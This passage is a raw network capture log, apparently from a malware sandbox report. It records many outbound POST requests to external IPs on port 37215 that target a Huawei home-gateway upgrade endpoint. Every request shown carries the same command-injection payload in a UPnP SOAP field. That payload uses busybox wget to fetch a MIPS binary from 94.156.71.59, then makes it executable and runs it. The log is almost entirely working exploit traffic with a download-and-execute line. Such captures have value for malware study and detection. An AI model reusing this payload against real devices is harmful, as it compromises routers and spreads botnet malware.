20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            172192.168.2.134059041.194.61.7637215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.015623093 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            173192.168.2.1360502156.176.31.9437215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.016307116 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            174192.168.2.1341972156.163.189.15137215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.017007113 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            175192.168.2.134466241.253.102.6137215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.017704964 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            176192.168.2.1335452197.116.197.15637215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.018435001 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            177192.168.2.1357320156.12.201.18837215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.019151926 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            178192.168.2.1341708156.19.135.4937215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.019872904 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            179192.168.2.1356620156.24.110.6137215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.020596027 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            180192.168.2.135156241.130.180.4637215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.021323919 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            181192.168.2.1348046197.167.77.11337215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.022038937 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            182192.168.2.1338164156.162.243.2137215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.022727013 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
